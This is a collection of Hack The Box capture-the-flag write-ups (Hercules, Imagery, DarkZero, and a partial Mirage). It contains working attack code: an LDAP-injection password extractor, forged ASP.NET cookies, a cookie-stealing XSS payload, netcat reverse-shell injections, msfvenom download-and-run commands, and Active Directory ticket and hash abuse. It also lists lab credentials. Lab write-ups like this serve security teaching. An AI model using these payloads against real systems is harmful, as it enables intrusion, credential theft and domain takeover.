|   Checking for Conficker.C or higher...
|   Check 1 (port 65257/tcp): CLEAN (Timeout)
|   Check 2 (port 63960/tcp): CLEAN (Timeout)
|   Check 3 (port 8730/udp): CLEAN (Timeout)
|   Check 4 (port 30712/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2025-11-19T09:55:55
|_  start_date: N/A
|_clock-skew: 0s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

88/TCP - Kerberos

mutating wordlist

Starting off I tried enumerating some users but this gave no valid users.

I then decided to mutate existing wordlists:

while read -r u; do for c in {a..z}; do echo "${u}.${c}"; done; done < /usr/share/seclists/Usernames/statistically-likely-usernames/john.txt > mutated.txt

This started pouring out usernames like it was christmas:

Exploitation

443/TCP - HTTPS

Over on port 443 we notice a website running:

This appears to be static so I run a gobuster scan.

gobuster

I find the /login endpoint and head on over:

I tried some input to analyse the request:

burpsuite

Inside burp I analysed the request:

We need to be caucious with our testing:

It appears that there is some sort of rate-limiting present.

:::note Since the found users are using the ldap protocol this could mean that there is a presence of LDAP Injection here. :::

LDAP Injection

For my testing I would use this cheatsheet:

Unfortunately this didn't show anything and it was more of a blind injection.

:::note I was stuck here and was provided the following script that would automate the LDAP Injection testing for me. :::

With the help of the below script we could quickly enumerate whether a user has a password in their description field.

#!/usr/bin/env python3
import requests
import string
import urllib3
import re
import time

GREEN = "\033[92m"
RESET = "\033[0m"

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Configuration
BASE = "https://hercules.htb"
LOGIN_PATH = "/Login"
LOGIN_PAGE = "/login"
TARGET_URL = BASE + LOGIN_PATH
VERIFY_TLS = False

# Success indicator (valid user, wrong password)
SUCCESS_INDICATOR = "Login attempt failed"

# Token regex
TOKEN_RE = re.compile(r'name="__RequestVerificationToken"\s+type="hidden"\s+value="([^"]+)"', re.IGNORECASE)

with open("usernames.txt", "r") as f:
    KNOWN_USERS = [line.strip() for line in f if line.strip()]

def get_token_and_cookie(session):
    response = session.get(BASE + LOGIN_PAGE, verify=VERIFY_TLS)
    token = None
    match = TOKEN_RE.search(response.text)
    if match:
        token = match.group(1)
    return token

def test_ldap_injection(username, description_prefix=""):
    session = requests.Session()
    token = get_token_and_cookie(session)
    if not token:
        return False

    # Build LDAP injection payload
    if description_prefix:
        escaped_desc = description_prefix
        if '*' in escaped_desc:
            escaped_desc = escaped_desc.replace('*', '\\2a')
        if '(' in escaped_desc:
            escaped_desc = escaped_desc.replace('(', '\\28')
        if ')' in escaped_desc:
            escaped_desc = escaped_desc.replace(')', '\\29')
        payload = f"{username}*)(description={escaped_desc}*"
    else:
        # Check if user has description field
        payload = f"{username}*)(description=*"

    # Double URL encode
    encoded_payload = ''.join(f'%{byte:02X}' for byte in payload.encode('utf-8'))

    data = {
        "Username": encoded_payload,
        "Password": "test",
        "RememberMe": "false",
        "__RequestVerificationToken": token
    }

    try:
        response = session.post(TARGET_URL, data=data, verify=VERIFY_TLS, timeout=5)
        return SUCCESS_INDICATOR in response.text
    except Exception as e:
        return False

def enumerate_description(username):
    charset = (
        string.ascii_lowercase +
        string.digits +
        string.ascii_uppercase +
        "!@#$_*-." + # Common special chars
        "%^&()=+[]{}|;:',<>?/`~\" \\" # Less common special chars
    )

    print(f"\n[*] Checking user: {username}")

    if not test_ldap_injection(username):
        print(f"[-] User {username} has no description field")
        return None

    print(f"[+] User {username} has a description field, enumerating...")
    description = ""
    max_length = 50
    no_char_count = 0

    for position in range(max_length):
        found = False
        for char in charset:
            test_desc = description + char
            if test_ldap_injection(username, test_desc):
                description += char
                print(f" Position {position}: '{char}' -> Current: {description}")
                found = True
                no_char_count = 0
                break
            # Small delay to avoid rate limiting IMPORTANT!!!
            time.sleep(0.01)

        if not found:
            no_char_count += 1
            if no_char_count >= 2:
                break

    if description:
        print(f"[+] Complete: {username} => {description}")
        return description
    return None

def main():
    print("="*60)
    print("Hercules LDAP Description/Password Enumeration")
    print(f"Testing {len(KNOWN_USERS)} users")
    print("="*60)

    found_passwords = {}
    
    for user in KNOWN_USERS:
        password = enumerate_description(user)
        if password:
            found_passwords[user] = password
            
            # Save results immediately
            with open("passwords.txt", "a") as f:
                f.write(f"{user}:{password}\n")
            print(f"\n[+] FOUND: {user}:{GREEN}{password}{RESET}\n")

    print("\n" + "="*60)
    print("ENUMERATION COMPLETE")
    print("="*60)

    if found_passwords:
        print(f"\nFound {len(found_passwords)} passwords:")
        for user, pwd in found_passwords.items():
            print(f" {user}: {pwd}")
    else:
        print("\nNo passwords found")

if __name__ == "__main__":
    main()

We run the script:

Further down below we notice this output:

johnathan.j
change*th1s_p@ssw()rd!!

However these creds don't work for the website:

Let's try them for the ldap protocol instead.

nxc

I used nxc to password spray:

:::note It mentions STATUS_NOT_SUPPORTED instead of logon failure, meaning we need to append the -k option to enable the kerberos pre_auth
:::

This time around we have a match:

ken.w 
change*th1s_p@ssw()rd!!

Checking the target with the get-desc-users module we see the password in jonathan.j's description:

:::important Don't store your password in the description 😁 :::

Access

This time around it gave me access:

Checking the mail we find 3 mails:

This mail shows us why we're able to connect using ldap credentials. Furthermore it shows us the web_admin user.

I then checked the next email:

Interesting, this might come in handy.

Lastly:

However even after adding these hosts to the /etc/hosts file the pages wouldn't load:

LFI

Instead I headed over to the Downloads tab:

When I intercepted the request upon downloading a file I noticed the following:

I sent this request to Repeater where I tried to abuse LFI:

/Home/Download?fileName=../../web.config

The response showed some valuable data:

decryption="AES"
decryptionKey="B26C371EA0A71FA5C3C9AB53A343E9B962CD947CD3EB5861EDAE4CCC6B019581" 
validation="HMACSHA256" 
validationKey="EBF9076B4E3026BE6E3AD58FB72FF9FAD5F7134B42AC73822C5F3EE159F20214B73A80016F9DDB56BD194C268870845F7A60B39DEF96B553A022F1BA56A18B80"

Dotnet

Using dotnet we can attempt some shenanigans:

When this is done we will need to use the following commands:

dotnet add package AspNetCore.LegacyAuthCookieCompat --version 2.0.5
dotnet restore

Now we will be overwriting the Program.cs code using the following code:

using System;
using System.Security.Claims;
using System.Threading.Tasks;
using AspNetCore.LegacyAuthCookieCompat;

class Program
{
    static void Main(string[] args)
    {
        string validationKey = 
"EBF9076B4E3026BE6E3AD58FB72FF9FAD5F7134B42AC73822C5F3EE159F20214B73A80016F9DDB56BD194C268870845F7A60B39DEF96B553A022F1BA56A18B80";

        string decryptionKey = 
"B26C371EA0A71FA5C3C9AB53A343E9B962CD947CD3EB5861EDAE4CCC6B019581";

        var issueDate = DateTime.Now;
        var expiryDate = issueDate.AddHours(1);
        var formsAuthenticationTicket = new FormsAuthenticationTicket(1, "web_admin", 
issueDate, expiryDate, false, "Web Administrators", "/");

        byte[] decryptionKeyBytes = HexUtils.HexToBinary(decryptionKey);
        byte[] validationKeyBytes = HexUtils.HexToBinary(validationKey);

        var legacyFormsAuthenticationTicketEncryptor = new 
LegacyFormsAuthenticationTicketEncryptor(decryptionKeyBytes, validationKeyBytes, 
ShaVersion.Sha256);

        var encryptedText = 
legacyFormsAuthenticationTicketEncryptor.Encrypt(formsAuthenticationTicket);

        Console.WriteLine(encryptedText);
    }
}

:::important Pay attention to the above, this will basically forge us access as the web_admin account that we've found previously :::

Once the code is written we will compile and run it:

The program has compiled us a cookie which is valid for the web_admin user, we will now use this cookie to replace the current one on the website:

Now change the value of .ASPXAUTH to the generated cookie and refresh the page, this will change the access to web_admin:

File Upload Attack - Leaking NetNTLM Creds

We now get access to the Forms tab where we can abuse the file upload:

Using this script we're able to create a malicious .odt file. When uploaded this will ping our listener, e.g. responder in my case which will leak the NTLM creds of the user's account.

I then used the following commands:

python3 -m venv venv
source venv/bin/activate
uv pip install ezodf lxml
python3 Bad-ODF.py

After inputting my listener I uploaded the file and launched responder.

After a short while this was the output:

Using john I quickly cracked the password:

natalie.a
Prettyprincess123!

BloodHound

Using these creds I enumerated the domain using bloodhound:

:::note In hindsight I could've also done this using the creds for ken.w:

:::

I then launched bloodhound and ingested the files:

I then added my owned users and started enumerating the target:

For some reason it didn't fully show up as it should, this was due to a ingest error:

Apparently the groups didn't fully upload. I tried resetting the machine but it didn't do anything so I went on to use ldapsearch instead.

Using the following command I enumerated what groups natalie.a was part of:

ldapsearch -x -H ldap://10.10.11.91 -D "natalie.a@hercules.htb" -w 'Prettyprincess123!' -b "DC=hercules,DC=htb" "(sAMAccountName=natalie.a)"

This group didn't contain anyone useful but when I looked further I found someone who was:

And it then turned out that using the Web Support group, the user natalie.a has GenericWrite privileges over bob.w.

bloodyAD --host dc.hercules.htb -d 'hercules.htb' -u 'natalie.a' -k get writable

Shadow Certificate

certipy-ad

We will first have to obtain a tgt for natalie.a as NTLM creds won't work.

Accordingly we can execute the following command with certipy-ad in order to fetch the NT hash for bob.w:

This hash did not turn out to be crackable, but instead we can request another tgt but for bob.w this time around.

Using bloodyAD we will check out what we can do with the bob.w user:

bloodyAD --host dc.hercules.htb -d 'hercules.htb' -u 'bob.w' -k get writable

Amongst many others these stood out. Furthermore we noticed this user:

We're gonna go ahead and transfer them to the Web Department since that group has higher privs. To do this we'll be using the powerview.py tool,

Powerview

We install the tool as follows:

uv tool install git+https://github.com/aniqfakhrul/powerview.py

Next up we use the following commands:

powerview hercules.htb/bob.w@dc.hercules.htb -k --use-ldaps --dc-ip 10.10.11.91 -d --no-pass
Set-DomainObjectDN -Identity stephen.m -DestinationDN 'OU=Web Department,OU=DCHERCULES,DC=hercules,DC=htb'

Since the stephen.m user is now modified under the Web Department we'll need to request his shadow cert using natalie.a, and afterwards request his TGT:

certipy-ad shadow -u 'natalie.a@hercules.htb' -account 'stephen.m' auto -dc-host dc.hercules.htb -k

impacket-getTGT 'hercules.htb/stephen.m' -hashes :9aaaedcb19e612216a2dac9badb3c210 -dc-ip 10.10.11.91

Next up we can use powerview again to change the password of Auditor:

powerview hercules.htb/stephen.m@dc.hercules.htb -k --use-ldaps --dc-ip 10.10.11.91 -d --no-pass
Set-DomainUserPassword -Identity Auditor -AccountPassword 'P@ssword123'

Now we can go ahead and request the ticket for the modified Auditor user:

Foothold

5986/TCP - WINRMS

:::important For the following I used this python binary:

:::

Finally we get access as the Auditor user with the following winrmexec command:

user.txt

Luckily for us the user.txt flag was up for grabs:

Enumeration

Since my bloodhound was sub-optimal I tried to collect data fresh from the target using sharphound, but the host flagged it as a virus:

I then started doing some basic enum commands in order to find out more about the environment and the user:

Turns out the Auditor user is part of the Forest Management group.

Forest Migration OU

We can check the ACL's of the Forest Migration OU:

(Get-ACL "AD:OU=Forest Migration,OU=DCHERCULES,DC=hercules,DC=htb").Access | Where-Object { $_.IdentityReference -like "*Forest Management*" } | Format-List *

Having found this we'll want to use bloodyAD again in order to set our Auditor user as owner of the Forest Migration OU:

bloodyAD --host dc.hercules.htb -d 'hercules.htb' -u Auditor -k set owner 'OU=FOREST MIGRATION,OU=DCHERCULES,DC=HERCULES,DC=HTB' Auditor

Afterwards we'll want to add the GenericAll privs:

bloodyAD --host dc.hercules.htb -d 'hercules.htb' -u Auditor -k add genericAll 'OU=FOREST MIGRATION,OU=DCHERCULES,DC=HERCULES,DC=HTB' Auditor

Now I enumerated the users within the Forest Migration OU:

Get-ADUser -SearchBase "OU=Forest Migration,OU=DCHERCULES,DC=hercules,DC=htb" -Filter *

I enumerated the found users, one stood out:

Enabling fernando.r account

Since the account is disabled we'll need to enable it first using powerview.

powerview hercules.htb/Auditor@dc.hercules.htb -k --use-ldaps --dc-ip 10.10.11.91 -d --no-pass

Add-DomainObjectAcl -TargetIdentity "OU=FOREST MIGRATION,OU=DCHERCULES,DC=HERCULES,DC=HTB" -PrincipalIdentity auditor -Rights fullcontrol -Inheritance
Set-DomainUserPassword -Identity fernando.r -AccountPassword 'P@ssword123'
Set-ADUser -Identity "fernando.r" -Enabled $true

Then from our other terminal:

Privilege Escalation

ESC3

Now we'll request the TGT for fernando.r:

impacket-getTGT 'hercules.htb/fernando.r':'P@ssword123' -dc-ip 10.10.11.91

In turn I used the following to find the ESC3 - ADCS vulnerability on the target:

certipy-ad find -k -dc-ip 10.10.11.91 -target dc.hercules.htb -stdout -vulnerable

This is good news, we can abuse the permissions on the Enrollment Rights template using certipy-ad:

certipy-ad req -u "fernando.r@hercules.htb" -k -no-pass -dc-host dc.hercules.htb -dc-ip 10.10.11.91 -target "dc.hercules.htb" -ca 'CA-HERCULES' -template "EnrollmentAgent" -application-policies "Certificate Request Agent"

Next up we will enroll the ashley.b user:

certipy-ad req -u "fernando.r@hercules.htb" -k -no-pass -dc-host dc.hercules.htb -dc-ip 10.10.11.91 -target "dc.hercules.htb" -ca 'CA-HERCULES' -template "User" -on-behalf-of 'HERCULES\ashley.b' -pfx fernando.r.pfx -dcom

Now we're gonna pass on the cert.

certipy-ad auth -pfx ashley.b.pfx -dc-ip 10.10.11.91

Afterwards we're gonna request a TGT ticket again:

We can now go ahead and login.

Lateral Movement to ashley.b

After logging in I enumerated the user's home directory:

Multiple powershell scripts were discovered. I viewed these one by one.

The Desktop directory:

The Mail directory:

The Scripts directory:

Enabling iis_administrator account

:::note This is the same as [[#Enabling fernando.r account]] but this time around from linux using bloodyAD, this is simply because it did not work for me using powerview here. :::

We're gonna be running the aCleanup.ps1 script.

Next up we're gonna abuse the GenericAll privs again from the Forest Migration OU of Auditor:

bloodyAD --host 'dc.hercules.htb' -d 'hercules.htb' -u 'auditor' -k add genericAll 'OU=Forest Migration,OU=DCHERCULES,DC=hercules,DC=htb' 'IT SUPPORT'

Now we'll want to focus on taking over the IIS_Administrator account.

bloodyAD --host 'dc.hercules.htb' -d 'hercules.htb' -u 'auditor' -k add genericAll 'OU=Forest Migration,OU=DCHERCULES,DC=hercules,DC=htb' Auditor
bloodyAD --host DC.hercules.htb -d hercules.htb -u 'Auditor' -k remove uac "IIS_Administrator" -f ACCOUNTDISABLE

:::warning If the latter command fails for whatever reason, execute the aCleanup.ps1 script again and repeat the commands. :::

We will now be changing the password for the IIS_Administrator user:

bloodyAD --host DC.hercules.htb -d hercules.htb -u 'Auditor' -k set password "IIS_Administrator" "P@ssword123"

Following up we will yet again request the TGT:

impacket-getTGT 'hercules.htb/IIS_Administrator':'P@ssword123' -dc-ip 10.10.11.91

Changing iis_webserver$ password

Now we're gonna go ahead and change the password for the iis_webserver$ machine account.

bloodyAD --host DC.hercules.htb -d hercules.htb -u 'IIS_Administrator' -k set password "IIS_Webserver$" "P@ssword123"

Accordingly we request the TGT again, but with a slight twist. We need to request the TGT using a hash.

iconv -f ASCII -t UTF-16LE <(printf 'P@ssword123') | openssl dgst -md4
impacket-getTGT 'hercules.htb/IIS_Webserver$':'P@ssword123' -dc-ip 10.10.11.91

We can then use the describeTicket tool from impacket to view the session key:

Afterwards we use the changepasswd tool to change the password:

S4U2SELF Abuse - Impersonating Administrator

We can then request a CIFS impersonating the Administrator user.

impacket-getST -u2u -impersonate "Administrator" -spn "cifs/dc.hercules.htb" -k -no-pass 'hercules.htb'/'IIS_Webserver$'

After exporting the ticket we can log in, smooth sailing.

root.txt

</PasswordProtect>

HTB-Imagery

Maxim Andrei Koltypin — Thu, 20 Nov 2025 00:00:00 GMT

Scope:
10.10.11.88

Recon

Nmap

sudo nmap -sV -sC -sT -p- imagery.htb -T5 --min-rate=5000 -vvvv -Pn

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 9.7p1 Ubuntu 7ubuntu4.3 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http    syn-ack Werkzeug httpd 3.1.3 (Python 3.12.7)
|_http-title: Image Gallery
|_http-server-header: Werkzeug/3.1.3 Python/3.12.7
| http-methods: 
|_  Supported Methods: HEAD GET OPTIONS
9001/tcp open  http    syn-ack SimpleHTTPServer 0.6 (Python 3.12.7)
|_http-title: Directory listing for /
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: SimpleHTTP/0.6 Python/3.12.7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We notice 2 python webservers running as well as a ssh port.

I quickly check out both to see the difference:

I download the .zip and head on over to the 8000 port.

I couldn't access the .zip yet since it's encrypted with an AES encryption which meant we'd need the password first.

8000/TCP - HTTP

I can register for an account here:

Here I filled in the following creds for testing:

tester@test.com
Tester123!

In response I get the following GET request:

I noticed the isAdmin:false thus tried to manipulate it with an intercept:

However this just pops an error:

I went ahead and signed in to the account and once logged in was greeted with this dashboard:

At first glance this looks like a file upload attack.

We can upload images and down at the bottom I notice the Uploading as Account ID:

On upload I could view the image:

I could then either Download or Delete it.

Here arises the problem, the website isn't running on php so uploading a php webshell will be pointless. I started testing for other vulnerabilities.

API source code

By checking the source code I discovered that apparently the first user to be registered will be an Admin user:

Scrolling further down I find the following in the JS script:

It looks like there's a bug reporting functionality, as well as an admin panel.

I checked out the API:

It appears that we are not the first user to be registered then. I scrolled to the bottom of the home page and found the quick link to the bug reporting functionality:

Exploitation

Stored XSS

I tested out the functionality of the form:

I went on to test some XSS payloads:

This didn't give me any callback though. I checked out the source code again:

 data.bug_reports.forEach(report => {
	const reportCard = document.createElement('div');
	reportCard.className = 'bg-white p-6 rounded-xl shadow-md border-l-4 border-purple-500 flex justify-between items-center';
	
	reportCard.innerHTML = `
		<div>
			<p class="text-sm text-gray-500 mb-2">Report ID: ${DOMPurify.sanitize(report.id)}</p>
			<p class="text-sm text-gray-500 mb-2">
				Submitted by: ${DOMPurify.sanitize(report.reporter)} 
				(ID: ${DOMPurify.sanitize(report.reporterDisplayId)}) on ${new Date(report.timestamp).toLocaleString()}
			</p>
			<h3 class="text-xl font-semibold text-gray-800 mb-3">Bug Name: ${DOMPurify.sanitize(report.name)}</h3>
			<h3 class="text-xl font-semibold text-gray-800 mb-3">Bug Details:</h3>
			<div class="bg-gray-100 p-4 rounded-lg overflow-auto max-h-48 text-gray-700 break-words">
				${report.details}
			</div>
		</div>
		<button onclick="showDeleteBugReportConfirmation('${DOMPurify.sanitize(report.id)}')" 
		class="bg-red-500 hover:bg-red-600 text-white font-bold py-2 px-4 rounded-lg shadow-md transition duration-200 ml-4">
			Delete
		</button>
	`;
	bugReportsList.appendChild(reportCard);
});

We can exploit it and catch the admin cookie:

<img src=x onerror=\"fetch('http://10.10.14.42/c=' + document.cookie)\">

I inserted this cookie and was now able to access the Admin Panel:

Inside the admin panel we notice all the previously found API endpoints:

I downloaded one of the logs and noticed something right away:

We get a log_identifier parameter, it looks like it fetches local files. We can logically test for LFI now.

LFI

It worked right away, awesome. Right away I noticed 2 users:

web
mark

I tried fetching their id_rsa but this didn't work.

Using this cheatsheet I then found a useful endpoint:

Looking further in the /proc directory I found the /proc/self/cwd/config.py endpoint which referenced the db.json database which contained data for the website:

The hash for testuser is easily cracked:

iambatman

Unfortunately I could not password spray as the ssh port did not allow password auth:

I thus decided to login to the web page using the testuser creds instead:

I tried out uploading an image again and this time around there's more functionalities:

I could for example transform the image, e.g. crop it:

By applying the transformation I saw the following request:

Command Injection

I tried out to inject arbitrary commands:

This showed me that it tried to execute the command but failed. This is because it wants to append another command/file afterwards as shown by the +0.

Thus I tried out appending a #:

Even though it did not show any response it did not fail this time.

Foothold

Shell as web

I could finally form the following command in order to achieve a reverse shell:

"x":"8;bash -c 'busybox nc 10.10.14.42 80 -e bash' #",

However I was not able to get the user.txt flag yet. For this I had to move laterally to mark.

Enumeration

I transferred over some tools to enumerate the system:

linpeas

Some of the findings included:

I then found an interesting cron job which showed up as a PE vector:

Inside the file we find a set of creds:

admin@imagery.htb
strongsandofbeach

However other than that there was nothing inside this file. The creds couldn't be sprayed either against the other users:

Instead I went ahead and checked out the other cron job, which uses tar to make a backup of the /home directory.

I downloaded over the zip file:

Using strings I analyzed the file:

Apparently it's encrypted using pyAesCrypt 6.1.1

We can install the package as follows:

I then used the following script to brute force the password:

#!/usr/bin/env python3
import pyAesCrypt
import traceback

GREEN = "\033[92m"
RESET = "\033[0m"

buffer_size = 64 * 1024

encrypted_file = "web_20250806_120723.zip.aes"
output_file = "decrypted.zip"
wordlist = "/usr/share/wordlists/rockyou.txt"

def try_password(pwd):
    try:
        pyAesCrypt.decryptFile(encrypted_file, output_file, pwd.strip(), buffer_size)
        return True
    except Exception:
        return False

with open(wordlist, "r", encoding="latin-1") as wl:
    for password in wl:
        password = password.strip()
        try:
            if try_password(password):
                print(f"{GREEN}[+] Password found: {password}{RESET}")
                print("[✓] Decryption finished, check out output file.")
                break
        except KeyboardInterrupt:
            print("\n[!] Interrupted.")
            break
        except Exception:
            # silent fail for noisy errors
            pass
    else:
        print("[-] Password not found.")

The output is absolutely massive:

This was a complete backup of the /web directory. Luckily for us it also contained the original version of the db.json file, containing multiple credential sets:

The password is easily cracked

supersmash

Lateral Movement to mark

Using the password I move laterally:

A non-default binary is found, I'll focus on it after fetching the user.txt flag.

user.txt

Privilege Escalation

charcol

I check out the binary

Since I didn't know the password I used the -R flag:

I could then start it up in interactive mode:

After using the help command I skim the manual, noticing the cron jobs tab:

I will abuse this to add the following cron job which will give me a root shell.

auto add --schedule "* * * * *" --command "bash -c 'busybox nc 10.10.14.42 443 -e bash'" --name "hack"

After waiting for a short while:

root.txt

HTB-DarkZero

Maxim Andrei Koltypin — Sat, 22 Nov 2025 00:00:00 GMT

import PasswordProtect from "~/components/PasswordProtect.client";

Scope:
10.10.11.89

Creds:
john.w
RFulUtONCOL!

Recon

Nmap

sudo nmap -sC -sV -sT -p- -vvvv -T5 --min-rate=5000 -Pn darkzero.htb                                                                                                                                                                                                             
PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-11-14 18:27:45Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
1433/tcp  open  ms-sql-s      syn-ack Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.11.89:1433: 
|     Target_Name: darkzero
|     NetBIOS_Domain_Name: darkzero
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: darkzero.htb
|     DNS_Computer_Name: DC01.darkzero.htb
|     DNS_Tree_Name: darkzero.htb
|_    Product_Version: 10.0.26100
|_ssl-date: 2025-11-14T18:29:23+00:00; +2h10m01s from scanner time.
| ms-sql-info: 
|   10.10.11.89:1433: 
|     Version: 
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
2179/tcp  open  vmrdp?        syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49690/tcp open  msrpc         syn-ack Microsoft Windows RPC
49692/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49911/tcp open  msrpc         syn-ack Microsoft Windows RPC
49940/tcp open  msrpc         syn-ack Microsoft Windows RPC
49986/tcp open  msrpc         syn-ack Microsoft Windows RPC
49998/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 35679/tcp): CLEAN (Timeout)
|   Check 2 (port 52653/tcp): CLEAN (Timeout)
|   Check 3 (port 7628/udp): CLEAN (Timeout)
|   Check 4 (port 32811/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 2h09m58s, deviation: 2s, median: 2h09m57s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-11-14T18:28:41
|_  start_date: N/A

nxc

Since we already got valid creds I decided to use nxc to spray the credentials

I then tested out the mssql protocol and noticed that I was able to make queries:

Having found this info I used impacket-mssqlclient to log in.

1433/TCP - MSSQL

However the current user did not have permissions to execute cmd prompts:

What did work was the enum_links command which showed us that there was a second server:

Using this link we can get access to DC02 and execute arbitrary commands:

DC02 Foothold

Reverse shell as svc_sql

Now that we've found a way to execute commands we can go ahead and get ourselves a reverse shell:

Unfortunately there's no easy way to escalate privs:

Running basic enumeration commands tells us that this host is a Windows Server 2022 machine:

There are no hotfixes or installed patches, meaning it's a clean install. Let's look for priv esc options.

DC02 Privilege Escalation

CVE-2024-30088

During enumeration I found a fitting CVE that we could exploit here:

I tried to upload the following poc.exe and execute it in order to escalate my privs.

However one oversight was that it would launch a new shell. This would work if I had RDP access but since I only had a CLI shell this did not work.

msfconsole - FAIL

Instead I launched msfconsole:

msfconsole -q -x "use exploit/multi/handler; set LHOST tun0; set LPORT 443; set payload windows/x64/meterpreter/reverse_tcp; run"

I created the msfvenom payload for it:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.42 LPORT=443 -f exe -o shell.exe

On the mssqlclient session I used the following:

exec xp_cmdshell "powershell iwr -uri http://10.10.14.42/shell.exe -outfile C:\Users\Public\shell.exe"
exec xp_cmdshell "C:\Users\Public\shell.exe"

By running the exploit suggester I find that the target is indeed vulnerable to the previous found CVE:

:::fail For some reason this exploit just did not want to work. I tried it many times over and over and even reverted the machine, it did not work. I then grabbed up the Administrator hash from a fellow player and used a ligolo tunnel to log in. The intention was to exploit the CVE then do some post-exploitation where the hash would be discovered. :::

Tunneling

Since the exploit just kept failing I logged in with the provided NT hash instead:

impacket-psexec Administrator@172.16.20.2 -hashes ":6963aad8ba1150192f3ca6341355eb49"

user.txt

The user flag was found inside the Administrator's Desktop directory:

DC01 Foothold

Pivoting

Now that we've compromised the DC02 target we'll have to pivot over to the DC01 host. In order to do this we'll log into the mssqlclient again and try to steal a ticket by abusing the smb protocol using rubeus.exe:

Once uploaded we'll run rubeus in monitor mode:

Rubeus.exe monitor /interval:1 /nowrap

Right away we notice some output, however this is from the same system:

What we need is a TGT ticket from the users over on DC01. I'll use the following command from a new mssqlclient instance to get this:

exec xp_dirtree '\\DC02.darkzero.ext\\testing'

Over in the rubeus terminal I notice the output:

I copied the base64 output over and converted it to a .ccache ticket:

echo "doIFjDCCBYig.....xEQVJLWkVSTy5IVEI=" | base64 -d > ticket.kirbi
impacket-ticketConverter ticket.kirbi admin.ccache

DC01 Privilege Escalation

dcsync

All that's left now is to dcsync the DC01 target in order to fetch the hashes:

impacket-secretsdump -k -no-pass darkzero.htb/'DC01$'@DC01.DARKZERO.HTB

We can now easily log in as Administrator:

root.txt

</PasswordProtect>

HTB-Mirage

Maxim Andrei Koltypin — Sat, 22 Nov 2025 00:00:00 GMT

Scope:
10.10.11.78

Recon

Nmap

sudo nmap -sC -sV -sT -p- -vvvv -T5 --min-rate=5000 -Pn mirage.htb

PORT      STATE SERVICE         REASON  VERSION
53/tcp    open  domain          syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec    syn-ack Microsoft Windows Kerberos (server time: 2025-11-22 20:19:36Z)
111/tcp   open  rpcbind         syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc           syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn     syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap            syn-ack Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Issuer: commonName=mirage-DC01-CA/domainComponent=mirage
445/tcp   open  microsoft-ds?   syn-ack
464/tcp   open  kpasswd5?       syn-ack
593/tcp   open  ncacn_http      syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap        syn-ack Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
2049/tcp  open  nlockmgr        syn-ack 1-4 (RPC #100021)
